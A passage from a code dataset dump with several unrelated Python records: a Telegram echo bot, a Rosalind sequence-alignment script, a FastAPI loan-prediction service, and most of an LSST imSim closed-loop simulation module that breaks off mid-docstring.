"Web_Scrapper.py", "file_ext": "py", "file_size_in_byte": 1998, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "88", "api": [{"api_name": "streamlit.set_page_config", "line_number": 6, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 12, "usage_type": "call"}, {"api_name": "streamlit.form", "line_number": 14, "usage_type": "call"}, {"api_name": "streamlit.text_input", "line_number": 15, "usage_type": "call"}, {"api_name": "streamlit.form_submit_button", "line_number": 16, "usage_type": "call"}, {"api_name": "streamlit.empty", "line_number": 18, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 21, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 22, "usage_type": "call"}, {"api_name": "webbrowser.open_new_tab", "line_number": 40, "usage_type": "call"}, {"api_name": "webbrowser.open_new_tab", "line_number": 45, "usage_type": "call"}, {"api_name": "webbrowser.open_new_tab", "line_number": 50, "usage_type": "call"}, {"api_name": "webbrowser.open_new_tab", "line_number": 55, "usage_type": "call"}]} +{"seq_id": "7930173411", "text": "from subprocess import Popen\r\nfrom subprocess import PIPE\r\n\r\nfrom telegram import Bot\r\nfrom telegram import Update\r\nfrom telegram.ext import Updater\r\nfrom telegram.ext import CommandHandler\r\nfrom telegram.ext import MessageHandler\r\nfrom telegram.ext import Filters\r\n\r\nfrom echo.config import *\r\n\r\n\r\ndef do_start(bot: Bot, update: Update):\r\n bot.send_message(\r\n chat_id=update.message.chat_id,\r\n text=\"Hello! Send me something please\"\r\n )\r\n\r\n\r\ndef do_echo(bot: Bot, update: Update):\r\n chat_id = update.message.chat_id\r\n text = \"Ваш ID = {}\\n\\n{}\".format(chat_id, update.message.text)\r\n bot.send_message(\r\n chat_id=chat_id,\r\n text=text\r\n )\r\n\r\n\r\ndef do_help(bot: Bot, update: Update):\r\n bot.send_message(\r\n chat_id=update.message.chat_id,\r\n text=\"Это учебный бот\\n\"\r\n \"Список доступных команд есть в меню\\n\"\r\n \"Так же я отвечу на любое сообщение\"\r\n )\r\n\r\n\r\ndef do_time(bot: Bot, update: Update):\r\n process = Popen([\"date\"], stdout=PIPE)\r\n text, error = process.communicate()\r\n\r\n if error:\r\n text = \"Произошла ошибка, время неизвестно\"\r\n else:\r\n text = text.decode(\"utf-8\")\r\n\r\n bot.send_message(\r\n chat_id=update.message.chat_id,\r\n text=text\r\n )\r\n\r\n\r\ndef main():\r\n config = load_config()\r\n\r\n bot = Bot(\r\n token=config.TG_TOKEN\r\n )\r\n updater = Updater(\r\n bot=bot\r\n )\r\n\r\n start_handler = CommandHandler(\"start\", do_start)\r\n help_handler = CommandHandler(\"help\", do_help)\r\n time_handler = CommandHandler(\"time\", do_time)\r\n message_handler = MessageHandler(Filters.text, do_echo)\r\n\r\n updater.dispatcher.add_handler(start_handler)\r\n updater.dispatcher.add_handler(help_handler)\r\n updater.dispatcher.add_handler(time_handler)\r\n updater.dispatcher.add_handler(message_handler)\r\n\r\n updater.start_polling()\r\n updater.idle()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n", "repo_name": "olebas13/echo_bot", "sub_path": "echo/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2054, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "telegram.Bot", "line_number": 14, "usage_type": "name"}, {"api_name": "telegram.Update", "line_number": 14, "usage_type": "name"}, {"api_name": "telegram.Bot", "line_number": 21, "usage_type": "name"}, {"api_name": "telegram.Update", "line_number": 21, "usage_type": "name"}, {"api_name": "telegram.Bot", "line_number": 30, "usage_type": "name"}, {"api_name": "telegram.Update", "line_number": 30, "usage_type": "name"}, {"api_name": "telegram.Bot", "line_number": 39, "usage_type": "name"}, {"api_name": "telegram.Update", "line_number": 39, "usage_type": "name"}, {"api_name": "subprocess.Popen", "line_number": 40, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 40, "usage_type": "name"}, {"api_name": "telegram.Bot", "line_number": 57, "usage_type": "call"}, {"api_name": "telegram.ext.Updater", "line_number": 60, "usage_type": "call"}, {"api_name": "telegram.ext.CommandHandler", "line_number": 64, "usage_type": "call"}, {"api_name": "telegram.ext.CommandHandler", "line_number": 65, "usage_type": "call"}, {"api_name": "telegram.ext.CommandHandler", "line_number": 66, "usage_type": "call"}, {"api_name": "telegram.ext.MessageHandler", "line_number": 67, "usage_type": "call"}, {"api_name": "telegram.ext.Filters.text", "line_number": 67, "usage_type": "attribute"}, {"api_name": "telegram.ext.Filters", "line_number": 67, "usage_type": "name"}]} +{"seq_id": "24198752656", "text": "from Bio import Align\r\nfrom Bio.Align import substitution_matrices\r\nfrom Bio import SeqIO\r\nseqlist = []\r\nfor seq_record in SeqIO.parse(\"rosalind_edta.txt\", \"fasta\"):\r\n seqlist += [str(seq_record.seq)]\r\nquery = seqlist[0]; target = seqlist[1]\r\naligner = Align.PairwiseAligner()\r\nmatrix = substitution_matrices.load(\"BLOSUM62\")\r\naligner.substitution_matrix = matrix\r\naligner.open_gap_score = -5\r\nalignment = aligner.align(query, target)\r\nscore = aligner.score(query, target)\r\nprint(score)", "repo_name": "GracelynHill/Rosalind-Answers", "sub_path": "question_18.py", "file_name": "question_18.py", "file_ext": "py", "file_size_in_byte": 488, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "Bio.SeqIO.parse", "line_number": 5, "usage_type": "call"}, {"api_name": "Bio.SeqIO", "line_number": 5, "usage_type": "name"}, {"api_name": "Bio.Align.PairwiseAligner", "line_number": 8, "usage_type": "call"}, {"api_name": "Bio.Align", "line_number": 8, "usage_type": "name"}, {"api_name": "Bio.Align.substitution_matrices.load", "line_number": 9, "usage_type": "call"}, {"api_name": "Bio.Align.substitution_matrices", "line_number": 9, "usage_type": "name"}]} +{"seq_id": "27200512957", "text": "from fastapi import FastAPI\nfrom pydantic import BaseModel\nimport joblib\nimport pandas as pd\nfrom imblearn.pipeline import Pipeline\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.compose import ColumnTransformer\n\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import RandomForestClassifier\n\napp = FastAPI()\n\n# Models\nclass Applicant(BaseModel):\n Gender: str\n Married: str\n Dependents: int\n Education: str\n Self_Employed: str\n ApplicantIncome: int\n CoapplicantIncome: int\n LoanAmount: int\n Loan_Amount_Term: int\n Credit_History: int\n Property_Area: str\n Loan_Status: str\n\n# Import\nmodel_lr = joblib.load(\"model_lr.joblib\")\n\n# Routes\n@app.get(\"/\")\ndef home():\n return{'message': 'Hello World'}\n\n@app.post(\"/predict\")\ndef predict(data: Applicant):\n inp_data = data.dict()\n header = []\n value = []\n for key, val in inp_data.items():\n header.append(key)\n value.append(val)\n \n inp = pd.DataFrame([value], columns=header)\n result = model_lr.predict(inp)\n return{\"result\": result}", "repo_name": "yogifth/Project7-Machine-Learning", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1131, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "fastapi.FastAPI", "line_number": 13, "usage_type": "call"}, {"api_name": "pydantic.BaseModel", "line_number": 16, "usage_type": "name"}, {"api_name": "joblib.load", "line_number": 31, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 47, "usage_type": "call"}]} +{"seq_id": "29137945209", "text": "__all__ = [\"ClosedLoopTask\"]\n\nimport logging\nimport os\nimport shutil\nfrom argparse import ArgumentParser\nfrom copy import deepcopy\nfrom glob import glob\n\nimport astropy\nimport numpy as np\nfrom lsst.afw.cameraGeom import FIELD_ANGLE, DetectorType\nfrom lsst.daf import butler as dafButler\nfrom lsst.ts.imsim.imsim_cmpt import ImsimCmpt\nfrom lsst.ts.imsim.obs_metadata import ObsMetadata\nfrom lsst.ts.imsim.opd_metrology import OpdMetrology\nfrom lsst.ts.imsim.sky_sim import SkySim\nfrom lsst.ts.imsim.utils import (\n SensorWavefrontError,\n get_camera,\n get_config_dir,\n make_dir,\n plot_fwhm_of_iters,\n)\nfrom lsst.ts.ofc import OFC, OFCData\nfrom lsst.ts.wep.utils import CamType, FilterType, getCamNameFromCamType, getCamType\nfrom lsst.ts.wep.utils import getConfigDir as getWepConfigDir\nfrom lsst.ts.wep.utils import rotMatrix, runProgram\n\n\nclass ClosedLoopTask:\n \"\"\"Initialization of the closed loop task class to\n run the simulation with imSim.\"\"\"\n\n def __init__(self) -> None:\n self.log = logging.getLogger(type(self).__name__)\n\n # Sky simulator\n self.sky_sim = None\n\n # OFC calculator\n self.ofc_calc = None\n\n # imSim Component\n self.imsim_cmpt = None\n\n # Ra/Dec/RotAng coordinates used in the simulation.\n self.boresight_ra = None\n self.boresight_dec = None\n self.boresight_rot_ang = None\n\n # Use CCD image\n self.use_ccd_img = True\n\n def config_sky_sim(\n self,\n cam_type: CamType,\n obs_metadata: ObsMetadata,\n path_sky_file: str = \"\",\n star_mag: float = 15.0,\n ) -> None:\n \"\"\"Configure the sky simulator.\n\n If the path of sky file is not provided, The defult OPD field positions\n will be used.\n\n OPD: Optical path difference.\n\n Parameters\n ----------\n cam_type : lsst.ts.wep.utils.CamType\n Camera type.\n obs_metadata : lsst.ts.imsim.ObsMetadata\n Observation metadata.\n path_sky_file : str, optional\n Path to the sky file. (the default is \"\".)\n star_mag : float, optional\n Default star magnitude if there is no sky file used. This is to\n pretend there are the stars at OPD field positions. (the default is\n 15.)\n\n Raises\n ------\n ValueError\n This instrument name is not supported.\n \"\"\"\n\n self.sky_sim = SkySim()\n self.sky_sim.set_camera(cam_type)\n if path_sky_file == \"\":\n self._set_sky_sim_based_on_opd_field_pos(cam_type, obs_metadata, star_mag)\n else:\n abs_sky_file_path = os.path.abspath(path_sky_file)\n self.sky_sim.add_star_by_file(abs_sky_file_path)\n\n def _set_sky_sim_based_on_opd_field_pos(\n self,\n cam_type: CamType,\n obs_metadata: ObsMetadata,\n star_mag: float,\n ) -> None:\n \"\"\"Set the sky simulator based on the OPD field positions.\n\n OPD: Optical path difference.\n\n Parameters\n ----------\n cam_type : lsst.ts.wep.utils.CamType\n Camera type.\n obs_metadata : lsst.ts.imsim.ObsMetadata object\n Observation metadata.\n star_mag : float\n Star magnitude. This is to pretend there are the stars at OPD field\n positions.\n\n Raises\n ------\n ValueError\n This instrument name is not supported.\n \"\"\"\n\n self.log.info(\n \"Use the default OPD field positions to be star positions. \"\n f\"The star magnitude is chosen to be {star_mag}.\"\n )\n\n opd_metr = OpdMetrology()\n if cam_type in [CamType.LsstCam, CamType.LsstFamCam, CamType.ComCam]:\n field_x, field_y = list(), list()\n camera = get_camera(cam_type)\n for name in self.get_sensor_name_list_of_fields(cam_type):\n detector = camera.get(name)\n x_rad, y_rad = detector.getCenter(FIELD_ANGLE)\n x_deg, y_deg = np.rad2deg(x_rad), np.rad2deg(y_rad)\n field_y.append(x_deg) # transpose to convert from DVCS to CCS\n field_x.append(y_deg)\n opd_metr.field_x = field_x\n opd_metr.field_y = field_y\n else:\n raise ValueError(f\"This CamType ({cam_type}) is not supported.\")\n\n star_id = 0\n ra_in_deg_arr = np.array(opd_metr.field_x)\n dec_in_deg_arr = np.array(opd_metr.field_y)\n # Extra 180 degree rotation based upon this note:\n # https://lsstc.slack.com/archives/CHXKSF3HC/p1651863987821319?thread_ts=1651863934.274719&cid=CHXKSF3HC\n # that shows photons farthest from Zenith on sky appear on \"top\"\n # of focal plane.\n rotation = rotMatrix(\n obs_metadata.rotator_angle - obs_metadata.parallactic_angle + 180\n )\n for ra_in_deg, dec_in_deg in zip(ra_in_deg_arr, dec_in_deg_arr):\n # It is noted that the field position might be < 0. But it is\n # not the same case for ra (0 <= ra <= 360).\n ra_in_deg, dec_in_deg = np.dot(rotation, np.array([ra_in_deg, dec_in_deg]))\n ra_in_deg += obs_metadata.ra\n dec_in_deg += obs_metadata.dec\n if ra_in_deg < 0:\n ra_in_deg += 360.0\n self.sky_sim.add_star_by_ra_dec_in_deg(\n star_id, ra_in_deg, dec_in_deg, star_mag\n )\n star_id += 1\n\n def config_ofc_calc(self, cam_type: str) -> None:\n \"\"\"Configure the OFC calculator.\n\n OFC: Optical feedback calculator.\n\n Parameters\n ----------\n cam_type : lsst.ts.wep.utils.CamType\n Camera type.\n \"\"\"\n\n self.ofc_calc = OFC(OFCData(getCamNameFromCamType(cam_type)))\n\n def map_filter_ref_to_g(self, filter_type_name: str) -> str:\n \"\"\"Map the reference filter to the G filter.\n\n Parameters\n ----------\n filter_type_name : str\n Filter type name: ref (or ''), u, g, r, i, z, or y.\n\n Returns\n -------\n filter_type_name : str\n Mapped filter type.\n \"\"\"\n return \"g\" if filter_type_name in (\"ref\", \"\") else filter_type_name\n\n def check_boresight(self, boresight: list[float]) -> None:\n \"\"\"Check the boresight.\n\n Parameters\n ----------\n boresight : list[float]\n Boresight [ra, dec] in degree.\n\n Raises\n ------\n ValueError\n The right ascension (RA) should be in [0, 360].\n ValueError\n The declination (Dec) should be in [-90, 90].\n \"\"\"\n\n ra, dec = boresight\n if ra < 0 or ra > 360:\n raise ValueError(\"The right ascension (RA) should be in [0, 360].\")\n\n if dec < -90 or dec > 90:\n raise ValueError(\"The declination (Dec) should be in [-90, 90].\")\n\n def get_sensor_name_list_of_fields(self, cam_type: CamType) -> list[str]:\n \"\"\"Get the list of sensor name of fields.\n\n The list will be sorted based on the field index.\n\n Parameters\n ----------\n cam_type : lsst.ts.wep.utils.CamType\n Camera type.\n\n Returns\n -------\n list[str]\n List of sensor name.\n\n Raises\n ------\n ValueError\n This instrument name is not supported.\n \"\"\"\n\n camera = get_camera(cam_type)\n detector_type = (\n DetectorType.WAVEFRONT\n if cam_type == CamType.LsstCam\n else DetectorType.SCIENCE\n )\n return [\n detector.getName()\n for detector in camera\n if detector.getType() == detector_type\n ]\n\n def get_sensor_id_list_of_fields(self, cam_type: CamType) -> list[int]:\n \"\"\"Get the list of sensor ids of fields.\n\n The list will be sorted based on the field index.\n\n Parameters\n ----------\n cam_type : lsst.ts.wep.utils.CamType\n Camera type.\n\n Returns\n -------\n list[int]\n List of sensor ids.\n\n Raises\n ------\n ValueError\n This instrument name is not supported.\n \"\"\"\n\n camera = get_camera(cam_type)\n\n detector_type = (\n DetectorType.WAVEFRONT\n if cam_type == CamType.LsstCam\n else DetectorType.SCIENCE\n )\n return [\n detector.getId()\n for detector in camera\n if detector.getType() == detector_type\n ]\n\n def check_and_create_base_output_dir(self, base_output_dir: str) -> str:\n \"\"\"Check and create the base output directory.\n\n This function will create the directory if it does not exist.\n\n Parameters\n ----------\n base_output_dir : str\n Base output directory.\n\n Returns\n -------\n str\n Base output directory.\n \"\"\"\n output_dir = base_output_dir\n make_dir(output_dir, exist_ok=True)\n\n return output_dir\n\n def get_filter_type(self, filter_type_name: str) -> FilterType:\n \"\"\"Get the filter type.\n\n Parameters\n ----------\n filter_type_name : str\n Filter type name: ref, u, g, r, i, z, or y.\n\n Returns\n -------\n lsst.ts.wep.utils.FilterType\n Filter type.\n\n Raises\n ------\n ValueError\n This filter type is not supported.\n \"\"\"\n\n if filter_type_name in {\"\", \"ref\"}:\n return FilterType.REF\n elif filter_type_name == \"u\":\n return FilterType.LSST_U\n elif filter_type_name == \"g\":\n return FilterType.LSST_G\n elif filter_type_name == \"r\":\n return FilterType.LSST_R\n elif filter_type_name == \"i\":\n return FilterType.LSST_I\n elif filter_type_name == \"z\":\n return FilterType.LSST_Z\n elif filter_type_name == \"y\":\n return FilterType.LSST_Y\n else:\n raise ValueError(f\"This filter type ({filter_type_name}) is not supported.\")\n\n def _run_sim(\n self,\n cam_type: CamType,\n obs_metadata: ObsMetadata,\n base_output_dir: str,\n butler_root_path: str,\n sky_seed: int,\n pert_seed: int,\n iter_num: int,\n num_pro: int = 1,\n pipeline_file: str = \"\",\n imsim_config_pointer_file: str = \"\",\n turn_off_sky_background: bool = False,\n turn_off_atmosphere: bool = False,\n ) -> None:\n \"\"\"Run the simulation.\n\n Parameters\n ----------\n cam_type : enum 'CamType' in lsst.ts.wep.utility\n Camera type.\n obs_metadata : lsst.ts.imsim.ObsMetadata object\n Observation metadata.\n base_output_dir : str\n Base output directory.\n butler_root_path : str\n Path to the butler gen 3 repository.\n sky_seed : int\n Random seed for the sky background.\n pert_seed : int\n Random seed for the perturbations.\n iter_num : int\n Number of closed-loop iteration.\n num_pro : int, optional\n Number of processors to use. (The default is 1.)\n pipeline_file : str, optional\n Path to existing pipeline yaml file to use. If empty string\n then the code will write its own default pipeline yaml.\n (The default is \"\".)\n imsim_config_pointer_file : str, optional\n Path to pointer file with locations of yaml configuration\n files for imsim submodules. If empty string then the code\n will use the default in policy/config for the given inst.\n (The default is \"\".)\n turn_off_sky_background : bool, optional\n If set to True then the closed loop will simulate images\n without sky background. (The default is False.)\n turn_off_atmosphere : bool, optional\n If set to True then will turn off the imsim atmosphere.\n (The default is False.)\n \"\"\"\n state_0 = self.ofc_calc.ofc_controller.aggregated_state\n self.imsim_cmpt.dof_in_um = state_0\n\n # If using wavefront sensors we measure one per pair\n # and the field\n if cam_type == CamType.LsstCam:\n corner_sensor_name_list = self.get_sensor_name_list_of_fields(cam_type)\n corner_sensor_id_list = self.get_sensor_id_list_of_fields(cam_type)\n ref_sensor_name_list = []\n ref_sensor_id_list = []\n for sens_name, sens_id in zip(\n corner_sensor_name_list, corner_sensor_id_list\n ):\n if sens_name.endswith(\"SW0\"):\n ref_sensor_name_list.append(sens_name)\n ref_sensor_id_list.append(sens_id)\n else:\n ref_sensor_name_list = self.get_sensor_name_list_of_fields(cam_type)\n ref_sensor_id_list = self.get_sensor_id_list_of_fields(cam_type)\n\n # Common file and directory names\n opd_zk_file_name = \"opd.zer\"\n opd_pssn_file_name = \"PSSN.txt\"\n output_dir_name = \"pert\"\n output_img_dir_name = \"img\"\n iter_default_dir_name = \"iter\"\n dof_in_um_file_name = \"dofPertInNextIter.mat\"\n fwhm_iters_file_name = \"fwhmIters.png\"\n if pipeline_file == \"\":\n pipeline_file = None\n if imsim_config_pointer_file == \"\":\n imsim_config_pointer_file = None\n\n # Specific file names to the amplifier/eimage\n wfs_zk_file_name = \"wfs.zer\"\n\n # Do the iteration\n seq_num = 1000\n\n for iter_count in range(iter_num):\n # Set the observation sequence number\n obs_metadata.seq_num = seq_num + iter_count * 10\n\n # The iteration directory\n iter_dir_name = \"%s%d\" % (iter_default_dir_name, iter_count)\n\n # Set the output directory\n output_dir = os.path.join(base_output_dir, iter_dir_name, output_dir_name)\n make_dir(output_dir)\n self.imsim_cmpt.output_dir = output_dir\n\n # Set the output image directory\n output_img_dir = os.path.join(\n base_output_dir, iter_dir_name, output_img_dir_name\n )\n make_dir(output_img_dir)\n self.imsim_cmpt.output_img_dir = output_img_dir\n\n # Generate the sky images and calculate the wavefront error\n if cam_type == CamType.LsstCam:\n self._generate_images(\n obs_metadata,\n cam_type=cam_type,\n sky_seed=sky_seed,\n pert_seed=pert_seed,\n num_pro=num_pro,\n imsim_config_pointer_file=imsim_config_pointer_file,\n turn_off_sky_background=turn_off_sky_background,\n turn_off_atmosphere=turn_off_atmosphere,\n )\n elif cam_type in [CamType.LsstFamCam, CamType.ComCam]:\n for focus_z in [-1.5, 1.5]:\n obs_metadata.seq_num += 1\n obs_metadata.focus_z = focus_z\n self._generate_images(\n obs_metadata,\n cam_type=cam_type,\n sky_seed=sky_seed,\n pert_seed=pert_seed,\n num_pro=num_pro,\n imsim_config_pointer_file=imsim_config_pointer_file,\n turn_off_sky_background=turn_off_sky_background,\n turn_off_atmosphere=turn_off_atmosphere,\n )\n\n # Analyze the OPD data\n self.imsim_cmpt.analyze_opd_data(\n cam_type,\n zk_file_name=opd_zk_file_name,\n rot_opd_in_deg=obs_metadata.rotator_angle,\n pssn_file_name=opd_pssn_file_name,\n )\n\n if self.use_ccd_img:\n if cam_type in [CamType.LsstCam, CamType.LsstFamCam, CamType.ComCam]:\n list_of_wf_err = self._calc_wf_err_from_img(\n obs_metadata,\n butler_root_path=butler_root_path,\n cam_type=cam_type,\n num_pro=num_pro,\n pipeline_file=pipeline_file,\n )\n else:\n list_of_wf_err = self.imsim_cmpt.map_opd_data_to_list_of_wf_err(\n opd_zk_file_name, ref_sensor_id_list, ref_sensor_name_list\n )\n\n # Get the PSSN from file\n pssn = self.imsim_cmpt.get_opd_pssn_from_file(opd_pssn_file_name)\n self.log.info(\"Calculated PSSN is %s.\" % pssn)\n\n # Get the GQ effective FWHM from file\n gq_eff_fwhm = self.imsim_cmpt.get_opd_gq_eff_fwhm_from_file(\n opd_pssn_file_name\n )\n self.log.info(\"GQ effective FWHM is %.4f.\" % gq_eff_fwhm)\n\n # Set the FWHM data\n fwhm = self.imsim_cmpt.get_list_of_fwhm_sensor_data(opd_pssn_file_name)\n\n self.imsim_cmpt.reorder_and_save_wf_err_file(\n list_of_wf_err,\n ref_sensor_name_list,\n get_camera(cam_type),\n zk_file_name=wfs_zk_file_name,\n )\n\n # Calculate the DOF\n wfe = np.array(\n [sensor_wfe.annular_zernike_poly for sensor_wfe in list_of_wf_err]\n )\n\n sensor_names = np.array(\n [sensor_wfe.sensor_name for sensor_wfe in list_of_wf_err]\n )\n\n # Only include the fwhm data from sensor we are simulating\n # (e.g. only raft centers instead of full FAM).\n if self.use_ccd_img:\n fwhm_idx = [\n ref_sensor_name_list.index(sens_name) for sens_name in sensor_names\n ]\n fwhm = fwhm[fwhm_idx]\n\n # Pass data to OFC\n self.ofc_calc.set_fwhm_data(fwhm, sensor_names)\n\n self.ofc_calc.calculate_corrections(\n wfe=wfe,\n sensor_names=sensor_names,\n filter_name=obs_metadata.band.upper(),\n gain=-1,\n rotation_angle=obs_metadata.rotator_angle,\n )\n\n # Set the new aggregated DOF to phosimCmpt\n dof_in_um = self.ofc_calc.ofc_controller.aggregated_state\n self.imsim_cmpt.dof_in_um = dof_in_um\n\n # Save the DOF file\n self.imsim_cmpt.save_dof_in_um_file_for_next_iter(\n dof_in_um_file_name=dof_in_um_file_name\n )\n\n # Summarize the FWHM\n pssn_files = [\n os.path.join(\n base_output_dir,\n \"%s%d\" % (iter_default_dir_name, num),\n output_img_dir_name,\n opd_pssn_file_name,\n )\n for num in range(iter_num)\n ]\n save_to_file_path = os.path.join(base_output_dir, fwhm_iters_file_name)\n plot_fwhm_of_iters(pssn_files, save_to_file_path=save_to_file_path)\n\n def _generate_images(\n self,\n obs_metadata: ObsMetadata,\n cam_type: CamType,\n sky_seed: int = 42,\n pert_seed: int = 11,\n num_pro: int = 1,\n imsim_config_pointer_file: str | None = None,\n turn_off_sky_background: bool = False,\n turn_off_atmosphere: bool = False,\n ) -> None:\n \"\"\"Calculate the wavefront error from the images generated by PhoSim.\n\n Parameters\n ----------\n obs_metadata : lsst.ts.imsim.ObsMetadata object\n Observation metadata.\n cam_type : lsst.ts.wep.utils.CamType\n Camera type.\n sky_seed : int, optional\n Random seed for the sky background.\n (The default is 42.)\n pert_seed : int, optional\n Random seed for the perturbations.\n (The default is 11.)\n num_pro : int, optional\n Number of processor to run imSim. (the default is 1.)\n imsim_config_pointer_file : str or None, optional\n Path to imsim config pointer file.\n If None then the code will use the default in policy directory.\n (The default is None.)\n turn_off_sky_background : bool, optional\n If set to True then the closed loop will simulate images\n without sky background. (The default is False.)\n turn_off_atmosphere : bool, optional\n If set to True then will turn off the imsim atmosphere.\n (The default is False.)\n \"\"\"\n\n # Generate the images\n if imsim_config_pointer_file is None:\n if cam_type == CamType.LsstCam:\n default_pointer = \"lsstCamDefaultPointer.yaml\"\n elif cam_type == CamType.LsstFamCam:\n default_pointer = \"lsstFamCamDefaultPointer.yaml\"\n elif cam_type == CamType.ComCam:\n default_pointer = \"lsstComCamDefaultPointer.yaml\"\n imsim_config_pointer_file = os.path.join(get_config_dir(), default_pointer)\n\n base_config_yaml = self.imsim_cmpt.assemble_config_yaml(\n obs_metadata, imsim_config_pointer_file, cam_type\n )\n\n inst_cat = self.imsim_cmpt.gen_instance_catalog(self.sky_sim)\n inst_cat_path = os.path.join(self.imsim_cmpt.output_dir, \"instCat.txt\")\n with open(inst_cat_path, \"w\") as file:\n file.write(inst_cat)\n\n # Override imsim config defaults with instance catalog info\n base_config_yaml[\"image\"].pop(\"image_pos\")\n base_config_yaml[\"output\"][\"nproc\"] = num_pro\n base_config_yaml[\"image\"][\"random_seed\"] = sky_seed\n base_config_yaml[\"input\"][\"telescope\"][\"fea\"][\"m1m3_lut\"][\"seed\"] = pert_seed\n if turn_off_sky_background:\n base_config_yaml[\"image\"][\"sky_level\"] = 0\n if turn_off_atmosphere:\n base_config_yaml[\"input\"].pop(\"atm_psf\")\n if {\"type\": \"AtmosphericPSF\"} in base_config_yaml[\"psf\"][\"items\"]:\n base_config_yaml[\"psf\"][\"items\"].remove({\"type\": \"AtmosphericPSF\"})\n base_config_yaml[\"psf\"][\"items\"].append(\n {\"type\": \"Kolmogorov\", \"fwhm\": 0.7}\n )\n\n if cam_type == CamType.LsstCam:\n imsim_config_yaml = self.imsim_cmpt.add_sources_to_config(\n base_config_yaml, inst_cat_path, use_ccd_img=self.use_ccd_img\n )\n imsim_config_path = os.path.join(\n self.imsim_cmpt.output_dir, f\"imsimConfig_{obs_metadata.seq_num}.yaml\"\n )\n self.log.info(f\"Writing Imsim Configuration file to {imsim_config_path}\")\n self.imsim_cmpt.write_yaml_and_run_imsim(\n imsim_config_path, imsim_config_yaml\n )\n elif cam_type in [CamType.LsstFamCam, CamType.ComCam]:\n if self.use_ccd_img:\n # Run once for OPD\n imsim_opd_config_path = os.path.join(\n self.imsim_cmpt.output_dir, \"imsimConfig_opd.yaml\"\n )\n if not os.path.exists(imsim_opd_config_path):\n imsim_config_yaml = deepcopy(base_config_yaml)\n imsim_config_yaml = self.imsim_cmpt.add_sources_to_config(\n imsim_config_yaml, inst_cat_path, use_ccd_img=False\n )\n self.log.info(\n f\"Writing Imsim Configuration file to {imsim_opd_config_path}\"\n )\n self.imsim_cmpt.write_yaml_and_run_imsim(\n imsim_opd_config_path, imsim_config_yaml\n )\n\n # Run CCD images\n imsim_config_yaml = self.imsim_cmpt.add_sources_to_config(\n base_config_yaml, inst_cat_path, use_ccd_img=self.use_ccd_img\n )\n\n # Add defocus\n imsim_config_yaml[\"input\"][\"telescope\"][\"focusZ\"] = (\n obs_metadata.focus_z * 1e-3\n )\n # Remove OPD from config since we already created it\n imsim_config_yaml[\"output\"].pop(\"opd\")\n imsim_config_path = os.path.join(\n self.imsim_cmpt.output_dir,\n f\"imsimConfig_{obs_metadata.seq_num}.yaml\",\n )\n self.log.info(\n f\"Writing Imsim Configuration file to {imsim_config_path}\"\n )\n self.imsim_cmpt.write_yaml_and_run_imsim(\n imsim_config_path, imsim_config_yaml\n )\n else:\n # Run OPD only mode\n imsim_config_yaml = self.imsim_cmpt.add_sources_to_config(\n base_config_yaml, inst_cat_path, use_ccd_img=False\n )\n imsim_config_path = os.path.join(\n self.imsim_cmpt.output_dir, \"imsimConfig.yaml\"\n )\n imsimOpdPath = os.path.join(\n self.imsim_cmpt.output_img_dir,\n imsim_config_yaml[\"output\"][\"opd\"][\"file_name\"],\n )\n if os.path.exists(imsimOpdPath):\n self.log.info(\"OPD already created, moving to analysis.\")\n else:\n self.log.info(\n f\"Writing Imsim Configuration file to {imsim_config_path}\"\n )\n self.imsim_cmpt.write_yaml_and_run_imsim(\n imsim_config_path, imsim_config_yaml\n )\n\n def _calc_wf_err_from_img(\n self,\n obs_metadata: ObsMetadata,\n butler_root_path: str,\n cam_type: CamType,\n num_pro: int = 1,\n pipeline_file: str | None = None,\n filter_type_name: str = \"\",\n ) -> list[SensorWavefrontError]:\n \"\"\"Calculate the wavefront error from the images generated by PhoSim.\n\n Parameters\n ----------\n obs_metadata : lsst.ts.imsim.ObsMetadata object\n Observation metadata.\n butler_root_path : str\n Path to the butler repository.\n cam_type : lsst.ts.wep.utils.CamType\n Camera type.\n num_pro : int, optional\n Number of processor to run DM pipeline. (the default is 1.)\n pipeline_file : str or None, optional\n Path to existing pipeline yaml file to use.\n If None then the code will write its own default pipeline yaml.\n (The default is None.)\n filter_type_name : str, optional\n Filter type name: ref (or ''), u, g, r, i, z, or y.\n\n Returns\n -------\n list[lsst.ts.imsim.utils.SensorWavefrontError]\n List of SensorWavefrontError object.\n \"\"\"\n\n # Ingest images into butler gen3\n self.ingest_data(butler_root_path=butler_root_path, cam_type=cam_type)\n\n list_of_wf_err = self.run_wep(\n obs_metadata.seq_num,\n butler_root_path,\n cam_type,\n num_pro=num_pro,\n pipeline_file=pipeline_file,\n filter_type_name=filter_type_name,\n )\n\n return list_of_wf_err\n\n def _get_butler_inst_name(self, cam_type) -> str:\n \"\"\"Translate cam_type into suffix used by butler\n in command line instructions.\n\n Parameters\n ----------\n cam_type : lsst.ts.wep.utils.CamType\n Camera type.\n\n Returns\n -------\n str\n Suffix attached to \"LSST\" to specify instrument to butler.\n\n Raises\n ------\n ValueError\n CamType must be one of LsstCam, LsstFamCam, ComCam.\n \"\"\"\n\n if cam_type in [CamType.LsstCam, CamType.LsstFamCam]:\n butler_inst_name = \"Cam\"\n elif cam_type == CamType.ComCam:\n butler_inst_name = \"ComCam\"\n else:\n errMsg = f\"CamType {cam_type} not one of LsstCam, LsstFamCam, ComCam.\"\n raise ValueError(errMsg)\n\n return butler_inst_name\n\n def run_wep(\n self,\n seq_num: int,\n butler_root_path: str,\n cam_type: CamType,\n num_pro: int = 1,\n pipeline_file: str | None = None,\n filter_type_name: str = \"\",\n ) -> list[SensorWavefrontError]:\n \"\"\"Run wavefront estimation pipeline task for wavefront 